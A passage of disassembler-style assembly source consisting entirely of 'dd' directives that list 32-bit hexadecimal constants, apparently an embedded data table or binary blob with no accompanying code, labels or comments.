		dd 2B9D190Fh, 0D67FDDCh, 86E8977Dh, 1D25D146h, 0EA02F03Dh
		dd 397D5BF5h, 0B34FDFCFh, 2A60AC1Ah, 240755CAh,	0FAA5972Bh
		dd 0DDEDBA4Ch, 5751BF6Ch, 0FD109B87h, 2067949Ah, 9B1FB465h
		dd 7320E69Ch, 4E74DD5Eh, 14B3B605h, 0ED4F5309h,	5A3ACBCFh
		dd 0B6A8F4ABh, 4BA3133Eh, 32623361h, 0ED3E71E8h, 886FF540h
		dd 0F4971516h, 2A36DDC0h, 0EFAC7151h, 0E488CC5h, 54FD3EDFh
		dd 88261F56h, 0C65C223Eh, 861D2AF5h, 0A3EB5B49h, 9E425425h
		dd 0C3ADE946h, 6CB3B25Eh, 682A04D4h, 5AE9EECCh,	0D736116Ah
		dd 6F9FF6D8h, 0F082C994h, 325DA92Fh, 891E503Dh,	0DC64F7F2h
		dd 444BA4ADh, 5AC4B523h, 0D49DDFC3h, 781FDADh, 0E7278906h
		dd 17BB92A0h, 0E8496171h, 1822DCB6h, 5462F0F6h,	0B9BDAA92h
		dd 0BD39E2A0h, 0DAACA32Bh, 115B56DCh, 6CD450B5h, 154A87AFh
		dd 6CF6B541h, 5C0609FFh, 89981E07h, 80F562F1h, 0BECA7292h
		dd 7AB1B3B0h, 0AFFC9144h, 0BFCF71BEh, 0B6F27A12h, 5CBF5629h
		dd 0E2B258DFh, 5E6C1EBBh, 86D917Ch, 0D9E94414h,	85C91DC5h
		dd 7EA0AFF3h, 9D61E6B4h, 8A5A321Fh, 6EF07603h, 0EBD6FE53h
		dd 0E024A6D3h, 0E99F8F1Dh, 0CF2CF491h, 8283783h, 6FF9538Dh
		dd 6F62A318h, 3EB2D8BFh, 0F97F981Fh, 9D05EA64h,	0FBFF7E3Fh
		dd 0DBB0E117h, 0EC1BF230h, 560F50CAh, 174EEC5Fh, 51A2225Eh
		dd 202315F7h, 429628ABh, 9D1E83D5h, 2415E205h, 405915D4h
		dd 5754D6EEh, 258AECD8h, 0D525454Bh, 0E71DCE1Fh, 89CD25EAh
		dd 0CEC1E354h, 0E6A4E63h, 0C129D79Dh, 4232EEC5h, 0ABF39E25h
		dd 307CDBD7h, 0C141CBF2h, 0E9964E5Fh, 95BA02BDh, 4B359AFh
		dd 0FB86EE9Fh, 3781D9F9h, 0E9D13C23h, 7E35FB51h, 0A996A19h
		dd 6701562Bh, 97F38186h, 85385AC8h, 0BC8948B0h,	58268343h
		dd 669D575Dh, 0BA4CF04Bh, 0DE23F6Bh, 15CD94EFh,	2AB4A0B7h
		dd 7557C5DAh, 5CBB09E4h, 2FCA964Ah, 0BFB11562h,	0A1A9A69h
		dd 1FAE8E0Fh, 0C3296BE5h, 3EED722Dh, 2D4AC9F8h,	737DA659h
		dd 0DCF0C54Dh, 84150B91h, 0F7112A5Ah, 3F8EC14Bh, 5CFD04A2h
		dd 0EE3A2705h, 0E2C3C36Fh, 320797CFh, 0E35604C1h, 4DFAAD55h
		dd 3E749358h, 0F4309485h, 0F7CA5EBFh, 0FBBF741Bh, 37722477h
		dd 2C0D3FDBh, 0FA750639h, 50314AA2h, 12C3B74Bh,	31681A6Dh
		dd 0B010CD8Ch, 0D2DEAE2h, 96B9A5FCh, 0E7AAB398h, 1AD50E0Fh
		dd 4EA46145h, 9E751D77h, 0BDA309CCh, 0B81F0FBAh, 0B225AE6h
		dd 0A99EDF83h, 0AB8F77B7h, 0DA8BFDCEh, 65108353h, 2C9C463Bh
		dd 9A39F8D7h, 44720466h, 0C8435C1Eh, 5ACCA368h,	0C829F871h
		dd 0DF0D0DFFh, 5958C749h, 17411379h, 9D7FC0Eh, 406011BCh
		dd 3FBD35DCh, 2EAA28F2h, 1BC37A9Ch, 0AE41C247h,	0E488FDB1h
		dd 1430D208h, 658DABEBh, 17EE5CD2h, 5B000860h, 0E74BD6A3h
		dd 2F29B2B8h, 600A7DEFh, 981EDCFEh, 0BB46FB2Eh,	0F8FC4E4Eh
		dd 7B619417h, 76DBA611h, 0AE7B7E0Eh, 676863FFh,	369AB7AAh
		dd 0AEDEF351h, 9A51C51Eh, 4866C6D9h, 7097C4A1h,	2B340D96h
		dd 0B51559E7h, 7B4146E6h, 4918C739h, 568FD875h,	0D7A8042Ah
		dd 536C65FFh, 0D93F0CCEh, 9CCA1306h, 3E6C5FDFh,	0F7A86A0Fh
		dd 97E1F641h, 90297AD1h, 8D1B3994h, 7F7BF707h, 27717092h
		dd 0FE235101h, 2C582FC0h, 3895905Fh, 59B40B6Dh,	0A7F5968Ah
		dd 383C0483h, 4F0AB552h, 76B6D8F9h, 26CB951h, 0C9EE6BE7h
		dd 0F17C5A30h, 0B7BDBB35h, 0D46D93F1h, 9F5F705Dh, 0EA2AAD16h
		dd 9656AB38h, 87214EBh,	86A83CA0h, 5156853Eh, 0F3081229h
		dd 0D3AF2D60h, 0B8D4F80Ch, 0B198C669h, 6F516360h, 0FF2B5BF2h
		dd 7B43EC0Ah, 9355D5B5h, 0EAD33A53h, 61495F03h,	12ED2616h
		dd 4DB477D9h, 0EBF6C80Eh, 986839F8h, 1E30094Dh,	3C53A85Dh
		dd 0C14D4919h, 5C4DB5ACh, 795F17Ch, 0C976348Fh,	9B7F1C1Ch
		dd 0BF7DFBEDh, 0CE9749FBh, 63DA92Fh, 0CC521A88h, 1ABFD97Bh
		dd 0CF7FEB37h, 0D43344AFh, 9AD1AFFDh, 68FF6EDDh, 22BB2781h
		dd 8AF42919h, 844A5810h, 5D4D7AEEh, 0BC7A392h, 4FC1F957h
		dd 0A43B1C6Ch, 0AE9DD49Ch, 39D03B47h, 705F11E2h, 24B643E6h
		dd 8BE79ABEh, 6BEA7E19h, 0B9FD57ABh, 0A1B26DDAh, 28E45EA4h
		dd 0DC5E2FDCh, 175E9578h, 437FA67Bh, 34C3D86Bh,	81978A2Fh
		dd 0EE4AD6A6h, 3B32815Fh, 7F0F6E17h, 0BAA09321h, 4701FE9Dh
		dd 5150F049h, 1494A76Fh, 44F3F8F4h, 4987F030h, 76C4F35Bh
		dd 51E4CF4h, 0CEDC2D16h, 54930132h, 0A843D57Bh,	2B5176B7h
		dd 0B2D10D78h, 8A3EDBADh, 0AEA65BF6h, 0D941EA34h, 0B8BE25ACh
		dd 34BE688Ah, 0FB862FC7h, 6B0F1D23h, 0F5EE4FE6h, 1B88C64Dh
		dd 0B9EB6FA6h, 3879A0E9h, 0F96D76ECh, 0D052D193h, 6A0D4CF9h
		dd 0AABF8870h, 35315686h, 5851C5FCh, 5237921Eh,	0E7DEE87Dh
		dd 0BFFA04AAh, 0AC051F83h, 6D0E3A11h, 76B9F80Dh, 3074F822h
		dd 1171C451h, 0BE538FC4h, 0FD718D9Fh, 1A82D1E9h, 0B6B5B415h
		dd 6D0AC1B7h, 42E6C390h, 49D29BB4h, 3113EB89h, 0F0EFE335h
		dd 9E86C5F5h, 0A08E9F77h, 0B39A6208h, 0F9276E32h, 0EE2DED31h
		dd 605D1D5Ch, 0F5951268h, 0EE04F73Dh, 3DE20048h, 7F67A1CCh
		dd 2A86A305h, 0B54B34D9h, 24A7CE8h, 6A26AE8Dh, 81E3FB8Eh
		dd 0F4191A91h, 8D067DBAh, 0A2EAFAAEh, 26F234A2h, 2AFF7E2Ch
		dd 0B0FC9B10h, 0B6EB55B0h, 60785F12h, 0ECE7F632h, 0F66D54BCh
		dd 851C6AFEh, 0DCC78AEEh, 0F19EF78h, 8B154EEAh,	0C7309C0Fh
		dd 729020A7h, 0AA0AFC12h, 652B5985h, 0A6301FCAh, 6175AC05h
		dd 3ABA4D06h, 6B5D1D8Fh, 0EB684002h, 7B77B0A9h,	5A2E5743h
		dd 225E7E07h, 9A44A963h, 449BBFE3h, 7CED2AAAh, 0C416C2BEh
		dd 6257A279h, 0E55F7D4Eh, 45BBC61Ch, 5515854Fh,	15DDC162h
		dd 77D06D89h, 2930F5Ch,	6163C5BCh, 0DC0DBF5Fh, 82AC30EEh
		dd 0FBA6E4C3h, 24F27B34h, 0C730BCDCh, 0A0FAB42Eh, 212FF801h
		dd 0A1BAB57h, 0C2FB85DFh, 0AFDDBF8h, 0E2E3521Dh, 0E09EA8BFh
		dd 0BD57EAh, 9CD2DB4h, 0A9A4AD9Fh, 0E56F697Eh, 1A56CEB2h
		dd 2B4FACB4h, 383CA1F8h, 0BBC5583Dh, 0DBFB85F6h, 6355540h
		dd 0AE9CFEBBh, 0FB3F5744h, 57C58CE2h, 0B2AEE03Dh, 8A89FF55h
		dd 2BFC3DDEh, 172D6927h
		dd 2DB0C3F0h, 0F0AB9A8Dh, 0BBB1C1AAh, 58255743h, 77673E01h
		dd 0AF0FA8E0h, 0B8D538CFh, 0BEEE755Bh, 0D810DC5h, 7B683CF6h
		dd 82E98536h, 0A1DCDECDh, 22775113h, 6F4197C2h,	0C5805A2h
		dd 0D6FD1032h, 0D1C3513Fh, 0EC60C62Fh, 0BC3F916Bh, 58E5B4Eh
		dd 63B2A0FEh, 0E3853F5Ah, 5FCBA5D1h, 17EEFE0Ah,	0FFBFFCE5h
		dd 196CE828h, 0FC33471h, 4B34323Dh, 0C52F51A4h,	0CEBADC68h
		dd 4BA28984h, 4F025134h, 38063791h, 0EE531683h,	0F0ECC16Ah
		dd 3B4671C2h, 6DEC2175h, 0A68BAB9Bh, 0F7092A9Ah, 0A98B6F7Bh
		dd 0F5EBC52Bh, 4A97BC97h, 12853EB4h, 4FAD45A4h,	31B818B4h
		dd 7BB32A5Ch, 0B3E69846h, 0ECD0D39Eh, 0C997323Fh, 0A575A2BEh
		dd 0F7D8FBC5h, 1ACB73F2h, 1AE717Fh, 0ABA8F032h,	6108E74Eh
		dd 0D1F552C1h, 4D7155A4h, 47A83DB8h, 35CB501Bh,	0ACAAD343h
		dd 147B96AAh, 0D92D6C28h, 9F4DD3B3h, 77248F82h,	0FA64ECFCh
		dd 97460843h, 149163EEh, 0BBA90A6Dh, 60320B2Fh,	389159B4h
		dd 0F136154h, 0E2809FBFh, 0E8873993h, 7ED7B77Fh, 3197E37Eh
		dd 7155AB40h, 6BE44460h, 57C25563h, 49FE5E66h, 5DD2EA9Ah
		dd 0DDEA3582h, 0AAB0A029h, 0F067ED49h, 5D5F1B73h, 0EFB2F933h
		dd 0CCAA2FE6h, 712A5DC0h, 3C2EA6Bh, 8A468FC3h, 4C3C6E8h
		dd 7496DF76h, 0CEE63377h, 5C46C72h, 0F713EACCh,	6607B824h
		dd 18523ACCh, 0EF58505Fh, 74D1D16Bh, 0D126772Bh, 355395F3h
		dd 86029F7Eh, 0D7813DBFh, 0ADF12C8Ah, 0FD57F11Fh, 6FBA23C5h
		dd 0B4DD1F2Ch, 56885F95h, 44E648AFh, 657EC76Dh,	445DC8F4h
		dd 5155A563h, 0E18B2AD2h, 0FA82E0F9h, 0C3EA095Dh, 7D15C185h
		dd 0A928ABE2h, 90EF709h, 4F1DD2EFh, 0BC6FF2E1h,	981EBC42h
		dd 35CA543Eh, 387CEF36h, 1DEB98A8h, 0A475A7C8h,	0D45FD267h
		dd 56DDE153h, 8E4E22D1h, 3C5E2A56h, 4C710B8Bh, 1CCE0B6Bh
		dd 13D8BC0Dh, 0BF858D80h, 0AE7414A9h, 0D4A4F21Eh, 37689767h
		dd 3E2BA858h, 85D62A93h, 0F68A80F6h, 0CAB348AAh, 63332CAEh
		dd 3E7C1A77h, 2EB53290h, 58BE3F1Dh, 0A9AF1105h,	0E6390693h
		dd 0FC5395F7h, 0E1B63115h, 0FEFC30A7h, 3AD07111h, 77BB4E74h
		dd 260C2372h, 0C7C26E2Eh, 4CE47B83h, 0E3635265h, 14F6B31h
		dd 0B2C930B9h, 787CBE52h, 0EFB199C6h, 0BDA0C878h, 1A385D9Bh
		dd 48EF7B27h, 4E48CAC0h, 0E74D5453h, 0B19378CBh, 65D4668Fh
		dd 7FF1745Dh, 0E4C02519h, 164BC2C4h, 0CE2A57CDh, 727267B0h
		dd 45BBE89Dh, 756CF0B5h, 71D74D36h, 48F794D8h, 8A2F60Fh
		dd 56AD49BCh, 71F2B33Dh, 9AEA02A5h, 57CA112Fh, 0A1842276h
		dd 0DC6E8CEBh, 2C291DB1h, 0B56907E3h, 46C0C8F7h, 0D9D5A5EBh
		dd 42260EFh, 92DFACCFh,	6E7D33D1h, 0A0230EFEh, 972CDB76h
		dd 0F43D7679h, 10156F9Dh, 85CB7BF9h, 0E1C2FD40h, 65144388h
		dd 115BCC6Dh, 7756EA8Fh, 8385C293h, 0FF71FF86h,	8EAD884Eh
		dd 0A9A86136h, 0F3612DF1h, 0D54F4FEDh, 0B7AF7E71h, 23AFD457h
		dd 0B98F8E10h, 0D12292DFh, 2DAAC693h, 2FF6E5DCh, 5A33595Ch
		dd 2E80C3D3h, 0DE2C10C9h, 0BB0A4435h, 5CA75349h, 87556F53h
		dd 170486C7h, 0F2422AE9h, 47E6C4A1h, 6A44011Bh,	0B9AA96B7h
		dd 5B976DEBh, 64B4010Dh, 0F28181F4h, 0F1E7138Bh, 4F4CA3E1h
		dd 0F774F4CBh, 9F67ABD0h, 0BF9DB3AAh, 6FC8F8E7h, 0A6DF5B46h
		dd 845C7834h, 7BB53042h, 66950057h, 0AD1555D4h,	0F14CAFCCh
		dd 0CCE1EB4Bh, 0F5A17DF9h, 288B659Ah, 85045985h, 59A5DE0Eh
		dd 0FF697D0Ch, 42BFCC4Ah, 3B0DA29Eh, 51019D4h, 920BBA4Eh
		dd 84244AEh, 21C165BDh,	0E3C0561Bh, 0F5CA7E23h,	554AF67Ah
		dd 0F07BB7B5h, 0EBEE7BA5h, 4BDEFD31h, 5EB2389Ch, 205B0793h
		dd 0DA31E1EDh, 0BFA4BEAFh, 47E2364Ch, 0B660B138h, 0DE0E759Dh
		dd 33BB7F58h, 25FD5Ch, 0D2AA1617h, 2EC42E6Eh, 0A91A68B7h
		dd 0B2CD02BAh, 40FF82C3h, 75C3EEA5h, 0DBC7403Bh, 58A18A36h
		dd 0DD080FC7h, 0F1AB6A1Dh, 0BC25BCC6h, 387105D9h, 1F28F3D1h
		dd 80922CCDh, 7F8DEA2Bh, 5C2967B0h, 823380B2h, 51622173h
		dd 0ECA10FC6h, 50ACAADAh, 0C96E1110h, 0CDABBA68h, 6D1D8237h
		dd 692BABB4h, 0EC67A704h, 0FB2E980Ah, 0CD58C915h, 453E9749h
		dd 7F9A5CCFh, 0D8F717A7h, 0D9BBEE86h, 0FDF33F73h, 0FF22F6CBh
		dd 4F335232h, 5297FC78h, 0E99F77F6h, 0C5312DF8h, 0BBC15F03h
		dd 0B8B5B2D9h, 0BD475757h, 65B8F168h, 0D29932FAh, 0F3D889CEh
		dd 0B256912Fh, 0D10ED12Eh, 2060953Dh, 0CC0D159Ch, 1675B28Ch
		dd 0B4377BCDh, 8CCA09F8h, 0B9DC275Ah, 0CBA16188h, 8A45DDECh
		dd 9D571432h, 8F7C4527h, 88F536D2h, 20E5588Ch, 9DB4E83Ch
		dd 4AD2D772h, 0E3A3917Ah, 404B519Eh, 3FACCF14h,	63B9D687h
		dd 4D2DAEC0h, 0E84AAB08h, 0E7E04324h, 2F52C452h, 139F70F9h
		dd 621D8780h, 455F3EAAh, 553BACDh, 79DD6D17h, 0FF81FB18h
		dd 8F7A1F2Dh, 0B469A75Fh, 0AAF5E5C5h, 3B32BD24h, 0AAD15B9Ch
		dd 52ED0CBCh, 0FC262AD8h, 30056D70h, 4DBA4232h,	790DF051h
		dd 7A0F9F3h, 6CC70B27h,	0ECA2B65Ch, 2BBF8210h, 1CB80DADh
		dd 8AC553B4h, 5F0CD4A4h, 0CDE5C14Ch, 61BAE06Ch,	0C9DEEDBCh
		dd 795519DAh, 0D5610E31h, 2313551h, 0E1E71F7h, 796D66D3h
		dd 52A6878Ah, 322F13EDh, 75EDBA56h, 0F7A3B2B3h,	0CC0E7B17h
		dd 9E075183h, 161F7709h, 0EBDF980Dh, 457D83C9h,	783A5661h
		dd 0B6D30934h, 0C6F395ACh, 0D4889CB0h, 0B7499762h, 89FC7992h
		dd 1F46E1F8h, 98692022h, 57917156h, 0FBC52E59h,	6A1A8B85h
		dd 94C868C4h, 2D603DBAh, 764C7E1Ah, 0F2550845h,	23641BA4h
		dd 0B870B762h, 87A5CE33h, 180AC52Eh, 31498F1Fh,	91C85A3h
		dd 0B2A50B7Eh, 0BAC64CE6h, 3C71798Bh, 0E4EA3887h, 650D30ADh
		dd 794BE47Dh, 0A2F1095Fh, 0A4A9D2E7h, 9B2FF4DFh, 1EB544Fh
		dd 577B0A9Fh, 7E1C46AAh, 0BFFAA9BBh, 0C9403EAEh, 92D7BB9Ch
		dd 6B3071B6h, 8D37D282h, 85FC3E0Bh, 0B9ABAFE7h,	0CB4556D6h
		dd 32B02A99h, 9BB95D4Ah, 0E20EFE73h, 5B9C5CEEh,	87260622h
		dd 5737C97Fh, 0C15C0539h, 5DDADBCh, 558671B4h, 69050AD2h
		dd 25B65F8Bh, 944CB88Ah, 29AC7005h, 9A45CA21h, 8D68A1D4h
		dd 0DA77064Ah, 0A7B7196Bh, 7FEAB89Ah, 0D16A555Ch, 863C92FEh
		dd 43F6032Ch, 0F41FA58Eh, 0DC0FD127h, 0BFD3A716h, 0D6CA879Fh
		dd 4C223B75h, 0A3DCBD49h, 0ECBC1999h, 997E50F9h, 2D04107Bh
		dd 8DB71DA7h, 0A1D0FF06h, 0A1C346FBh, 1BD16CB4h, 0EB4479DFh
		dd 0D5DADD8Ah, 326C7A37h, 94A02EDh, 0A876A089h,	0B8A81DDDh
		dd 0C78CFF6Fh, 5843E6EEh, 0BDAF977Bh, 0C196B2FDh, 0D8A98286h
		dd 0DA28567Eh, 2F1A60A8h, 0D557762Bh, 0BAC1B2BFh, 0FA6687DFh
		dd 97F1DFCBh, 14D95098h, 0A21F560Ch, 62D5CC27h,	9E3E8CCEh
		dd 391D4208h, 0AE864CFBh, 5A2B18E7h, 7835B0E3h,	487231E5h
		dd 9E3EA6CDh, 0F4D87197h, 0A84D2E36h, 0BBF26CBAh, 0D0A724Dh
		dd 527A81E0h, 0F824886Ah, 0F56C12C8h, 4048DB2Eh, 0D5D5FD5h
		dd 2A6AB504h, 0F5E9DBD1h, 49AC2EA7h, 90CA6B71h,	0CDF2BAECh
		dd 0E11DBAD5h, 6753D007h, 0AF59B360h, 7F43130Eh, 0E6DB8AD5h
		dd 36B47990h, 18AA8D25h, 67D2F4FCh, 55E76FD6h, 0AB2C2D55h
		dd 452DFBB6h, 86C5DF81h, 8D712DFDh, 0AC6F2B1Eh,	0F26BDD00h
		dd 0D3435768h, 0D4F81525h, 51374937h, 0A2487735h, 5E0AC15Bh
		dd 0C975056Dh, 716BCAD5h, 0C295E9D4h, 2214A0B5h, 0CCBA01D6h
		dd 0EB9B02B2h, 2AE1D795h
		dd 575250AFh, 0F495DDA0h, 0A71C2935h, 0CDC81ACEh, 76A7A781h
		dd 0CDB1653Bh, 77AB1D26h, 0D961BC47h, 29884B24h, 3E6BB6F8h
		dd 685A7038h, 0AA1566E9h, 0B7DD7937h, 0CC6DE391h, 0AAE8E876h
		dd 2F5017D8h, 8F25DE8Eh, 0BFD16512h, 20EF882Dh,	1E7CEE48h
		dd 0AB1766FCh, 2C0560A1h, 68D3AEDh, 0BEB54B46h,	0C6DBD9E2h
		dd 0FE37490Ch, 8701F5E5h, 17B3CF47h, 77974C2h, 5F6256E5h
		dd 8342369Bh, 0C82EDE5Fh, 8F42E599h, 4FAE6132h,	576DD237h
		dd 9F59F292h, 8958CD74h, 63F0CA54h, 0EAB6B2F6h,	21E9FC27h
		dd 0F8BFD22Dh, 0DD6A54EAh, 0FB92CB53h, 228AC57Dh, 96BDBD0h
		dd 19A6ABC4h, 967B983Eh, 782E1564h, 3C0AC13Ch, 346F0F1Eh
		dd 64AF3158h, 0E0F5BAF6h, 0AAEF9732h, 0C36C05D1h, 4B981126h
		dd 597FABADh, 5D70EF8Ch, 0E8610891h, 0B484A6D7h, 0D65CF82Bh
		dd 5F031017h, 62E349DFh, 2DD1F995h, 938D19F0h, 0B1AFD641h
		dd 7F8ED45Fh, 0C93B4783h, 6F07BF40h, 473029A5h,	4D5AC1E1h
		dd 2FF23E2Ah, 2305F58Eh, 144BA445h, 1181DE12h, 36917F9h
		dd 0E186F797h, 0FAC37489h, 2594439Eh, 9F7262BBh, 2E616A86h
		dd 977D093Dh, 816FCF9Ch, 738F3B90h, 0FDB1BE22h,	0D5134CBh
		dd 0DB62968Fh, 3D5F67B6h, 0D67D1409h, 2ABA85CCh, 56C0248h
		dd 0F7EAA77Eh, 7D39B709h, 707DC3F1h, 0AE84A03Ah, 1D7C181Fh
		dd 336BA163h, 5D4B0554h, 0A49EBBC5h, 0A36EB453h, 0E28DAFA9h
		dd 0EE28E30Ah, 0E4FE04A8h, 0B7EF330Fh, 824FA168h, 0A4F37915h
		dd 0ACB9AE14h, 0EE36555Ah, 5763808Eh, 662A2D4h,	0F2E256D0h
		dd 40DFAF6Ch, 0A32B60EEh, 384EEAF5h, 3ED6A54h, 0F17EFDE3h
		dd 0EDE29DCBh, 7B0315BEh, 19BAE1AAh, 0DCE5BD4h,	0BF1305D5h
		dd 0F9FE6536h, 0DACDE0BBh, 0F9E6A63h, 0AA1521CCh, 77853543h
		dd 3E50B1Fh, 7B3C5F31h,	232ABB94h, 0DD58809h, 0BEF0721Bh
		dd 0C2C30FF0h, 0D3D72670h, 70F771D1h, 740F9D72h, 76A34DA2h
		dd 8C3F97Eh, 8713151Ch,	832BF6FBh, 0EEAC4D89h, 0D3FA7736h
		dd 0B2EDD909h, 0ADE0C3F1h, 0FAAD6AC1h, 4AC3984Ch, 3A9A7298h
		dd 2A10A9B0h, 22F86B6Eh, 0CF217FDh, 964DB617h, 0D04F04AAh
		dd 45DC5057h, 0E7E3A5DCh, 0E1E9804Fh, 0B4BB9AFEh, 46EB086Eh
		dd 26A3A8B6h, 9C49EF74h, 0A53BBCE0h, 3E14DCB7h,	555E87FDh
		dd 768FD847h, 4776852Ah, 32DBDECAh, 592F566Fh, 2DB0ACAFh
		dd 76CBEF1Ch, 99257B37h, 14E03E50h, 0CF2E46D1h,	0DE327AE7h
		dd 9E881186h, 13826571h, 23CB3DC7h, 15DADC17h, 64EA94FCh
		dd 0E5221C33h, 0FE03ABC5h, 651A6B46h, 27BFA726h, 0A5EEB88Eh
		dd 4754CB1h, 3328119Ah,	0F8AE6063h, 82B01A45h, 4DE49FCAh
		dd 8AD7BD17h, 0BC155D8Dh, 0D3C8EFEAh, 0AA84786Ah, 17D35AADh
		dd 10D9A95Ah, 5CA9352Dh, 6687C51Fh, 56987E78h, 0DA8A3B6Dh
		dd 0F81E975Ah, 515573A1h, 69AE9784h, 9D6558B9h,	0AA71D11Ah
		dd 24B25228h, 25F060BFh, 612DF23Ah, 5C42BFDEh, 0FC679BD3h
		dd 3B0AB2B0h, 14E5029Eh, 0D782E908h, 77642F8Ah,	0AC1DBAA9h
		dd 1C3C3718h, 519C9E50h, 0C4257AFBh, 0AF054Fh, 97AA60E1h
		dd 96E2A1Ah, 7C805AB3h,	0DE24CEDEh, 0C2BAB8AFh,	0A3432D08h
		dd 9AD779CFh, 5841606Fh, 0FFBFDEE4h, 0F29E76F5h, 7CF75703h
		dd 8E64DA7Eh, 7F520C28h, 0B537E9A8h, 29AE79FBh,	0A2923B45h
		dd 24BEEA20h, 528F3923h, 65F552B7h, 90D80FC1h, 62374EE8h
		dd 3AF71E06h, 62FF0DB8h, 0D52C5E6Ah, 0FBB57EBAh, 59B94B50h
		dd 0F2702D78h, 8099317Dh, 2B2597F9h, 0FA27F485h, 0AF1C82C0h
		dd 0D073F1Fh, 4117BFE2h, 0DAA5F5C7h, 0F40A18AEh, 968E923Ch
		dd 0C6BD607Bh, 0A8FF2FDCh, 6A4BDF87h, 0DDD33C44h, 24BDE2FDh
		dd 0DAE0A535h, 7F305E6Bh, 0ABD9FB51h, 5C0E80BCh, 55E2DF7Ch
		dd 0B10A2B9Dh, 5F07A811h, 46F6870Dh, 0A5D62C2Dh, 5B780616h
		dd 9B954362h, 228E2E07h, 0A241A1D4h, 0CCAB9E75h, 2BEA4BD7h
		dd 0FA2110B8h, 52874A37h, 0D2177E6Bh, 392A06E0h, 0A9CE4FC5h
		dd 417BBBC7h, 0BE6BC4B8h, 0D4B82A6Eh, 6AB1B054h, 8E734DD2h
		dd 6413892Ah, 0F10CEA9Eh, 7DF312BEh, 62EFDB69h,	0F0B5B975h
		dd 0C44B2756h, 0D2DAD4DDh, 612A3B55h, 0F36D27F0h, 0BEE1FF58h
		dd 0B0DF3766h, 0B56D3DF8h, 40C0EC97h, 0F5AECC9Dh, 0BE395613h
		dd 0A0F645D5h, 0A280CD2Ah, 0F912A5C2h, 0E056AF41h, 2081A11Bh
		dd 380926B0h, 56B46045h, 38F35015h, 0A11462ACh,	2320106Eh
		dd 22AE5748h, 0E2297E30h, 2A139024h, 98EF501h, 1E605C77h
		dd 84CC3E23h, 0E8134F73h, 0D0141194h, 0C30023Bh, 60475FACh
		dd 0F2D2BD08h, 2A3A029h, 50131F31h, 14C026Ah, 11F2FB85h
		dd 78209029h, 4819830Ah, 0B0372C30h, 5181D1E5h,	1A4F9883h
		dd 51413423h, 28811B01h, 0B0025685h, 71168104h,	6705B304h
		dd 0F5178F9h, 0FE68514Dh, 8CDD6F85h, 11814546h,	1D4814h
		dd 0C5D13DC5h, 0E139D149h, 0F3828514h, 604F80F8h, 5F4E90Eh
		dd 218D7144h, 0C41A8139h, 0EA31E9E8h, 849A2868h, 6A8CC7A2h
		dd 0C688A62h, 865871A3h, 40D5C50Ah, 0F316D3E6h,	0E36D0AA6h
		dd 45B73A3Bh, 4ABAD9B4h, 67378F1Eh, 699ADD6Eh, 2B2EAF8Ah
		dd 5FD2A05Ah, 60CABB43h, 0BEFD7EB7h, 6828A65Bh,	2C625CDFh
		dd 7C4F487Dh, 75FB077Ah, 0D75525F7h, 25C15FB0h,	0BEBDE91Eh
		dd 0AC5F7C11h, 1010D015h, 497A21F8h, 96460207h,	1D44F2EEh
		dd 285F3290h, 2F67A9FAh, 8C0FCCF6h, 43FEC02h, 0CAA8CA4Fh
		dd 0D1008C2Fh, 0CF677673h, 1F0A30A9h, 0E443F168h, 23D1B5C1h
		dd 0CE658256h, 2A7E132Eh, 59C70FE9h, 3BA40781h,	0E426DE8Eh
		dd 87F3B303h, 548FAF68h, 0C6CF3EB6h, 0A752770Dh, 7F17BA2Dh
		dd 0C5FDEF8Bh, 558CAA47h, 872AB54h, 0ADDD2F95h,	4D04E6CFh
		dd 665D5FACh, 0BD99627Bh, 77ADEE2Bh, 837D75D0h,	0A37A1A9Bh
		dd 72602612h, 4D7D44FFh, 2B1F6059h, 49DEF245h, 0FD0047E3h
		dd 63352C59h, 0D757D04Eh, 0D89A0C0Fh, 0FFBEA89Fh, 0FC2EC8E8h
		dd 35D61562h, 234AADCBh, 0C4F0B451h, 0E3BCE87Eh, 0A1FD7C09h
		dd 0D4B8AD84h, 0BBC68761h, 50407AE9h, 0EDBBD638h, 0F27EC085h
		dd 0BFBEDC45h, 872FC86Bh, 71D55125h, 67858E16h,	11F5814Bh
		dd 87E21949h, 0A80B4D64h, 0E7FA38F5h, 0B46DAB02h, 48EE33A1h
		dd 83EABE1Dh, 3227661Fh, 0AADEF883h, 4AAEC5C3h,	62FE31DDh
		dd 0DD81E25Bh, 0E6EA4073h, 5774E255h, 94BDD37Eh, 7C5396E3h
		dd 0BFBCC16Fh, 17FD9C0Ah, 0F59F9E73h, 0CCBFC0F3h, 3CB3AEF6h
		dd 107C1F49h, 3417532Dh, 39E43B55h, 2A6B0350h, 4362F7C8h
		dd 0CF8AA884h, 0AF481097h, 0EE9D4D6Dh, 1F78FEEAh, 2F0B854Ch
		dd 555B3215h, 49FF84C9h, 5F1CDC8Fh, 3223925Ch, 85732065h
		dd 69F2DC8Eh, 5089217Fh, 1C187D17h, 0C24A32Ah, 58A7BDA4h
		dd 11307C77h, 3096B2A2h, 0C86D16BBh, 36E26D62h,	66D457A5h
		dd 1177E5Fh, 28DF9662h,	14F9EEFEh, 65764A18h, 3BF6A181h
		dd 2F03A95Ah, 466A4FCEh, 9F0EF3E0h, 0A5F87F59h,	644AB617h
		dd 260ACFAFh, 0CD5BFF65h, 469EB968h, 2BECBD58h,	769B2E92h
		dd 8D38283Bh, 0F9618559h, 6CA44A70h, 0FC50A4BEh, 13FE8E4Ah
		dd 0C6EC7AE2h, 0C823D17Fh, 9DA2F782h, 9114B0DAh, 3976E924h
		dd 3BF2029Fh, 1D599509h, 0D09AAB71h, 0BC0CF12Ch, 607C44Fh
		dd 5731B56Ch, 0E375D44Bh, 1D54C497h, 47070E6Dh,	484DF401h
		dd 0A293AD0Bh, 0F4DDDD5Fh, 792C0138h, 0C1838B48h, 6DA6197Ah
		dd 0B338E376h, 6B4BFEC1h
		dd 928257E7h, 82C034E0h, 2F22B44Dh, 28EE01AEh, 0FC7DAB95h
		dd 963DCDEDh, 91879AF0h, 0BC0D4743h, 0A3778BDAh, 611E3814h
		dd 0D1E9E08Ah, 0A9165A3Ah, 0DBAD828Fh, 776969EEh, 533F461Dh
		dd 0F93E9BDDh, 31DBD6ECh, 4BAD33C0h, 9B4D576Ah,	37D54E51h
		dd 0E258BAF6h, 83273DAFh, 95735340h, 0F9A7B257h, 0C50540C0h
		dd 0AE2432F9h, 8754AC8Bh, 3E27D2F8h, 76A1F938h,	0ABE342D0h
		dd 0A444BBF5h, 0FF8F61ACh, 39FB294Ah, 467647C3h, 77E99CFDh
		dd 7F421B28h, 785F71DEh, 0B516D317h, 7D67B13Eh,	0E044ECF6h
		dd 36A33281h, 405B5DE1h, 0DA22C1EBh, 4EC4BDF8h,	140EDA38h
